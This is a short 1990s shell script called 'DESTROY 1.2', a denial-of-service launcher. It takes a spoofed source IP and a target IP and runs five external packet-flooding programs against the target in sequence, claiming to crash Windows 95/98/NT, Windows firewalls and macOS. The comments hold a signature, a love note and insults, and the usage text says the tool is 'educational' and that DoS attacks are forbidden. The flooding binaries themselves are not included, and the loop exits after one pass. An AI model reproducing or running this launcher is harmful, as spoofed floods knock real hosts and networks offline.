#!/bin/sh
#DESTROY 1.0 is tools kit for destroy all win + firewall and macos
#DESTROY 1.0 BY CAMELEON G. 3octo1998
#DESTROY 1.2 MAX PUISSANCE , DESTROY ALLLLLLLLLLLLLLLLLLLL!!!!
#JE t'aime christelle!
#FUCK:billou, windaube!

#while
TT=1
MAX=1024

#INSCRIPTION DES PROG
pr1=./1234
pr2=./destroy
pr3=./2-1234
pr4=./FOAD
pr5=./2-FOAD

#packet option
PKTSEF=50000
PKTSF=10000
PKTSN=2000

#destroy option

SRC=$1
DST=$2

if [ $# -ne 2 ]; then
        echo "DESTROY TOOL KIT BY CAMELEON G. 3octo1998"
        echo "DESTROY affecte: all win (98,95,3.1,NT),firewall win , macos"
        echo "DESTROY 1.2 MAXI PUISSANCE"
        echo "I LOVE YOU CHRISTELLE!"
        echo "$0 <ip spoof> <dst ip>"
        echo "ex:./DESTROY www.arctik.com 127.0.0.1"
        echo "no lag with this prog"
        echo "PROG A BUT EDUCATIF"
        echo "les attacks denial of services sont interdite!"
        echo "10 to 20 min for destroy! :("
        exit 0
fi

while [ $TT -lt $MAX ]; do
       $pr1 $SRC $DST $PKTSEF
       $pr2 $SRC $DST $PKTSF
       $pr3 $SRC $DST $PKTSN
       $pr4 $SRC $DST $PKTSN
       $pr5 $SRC $DST $PKTSN 
exit 0
done

exit 0

end DESTROY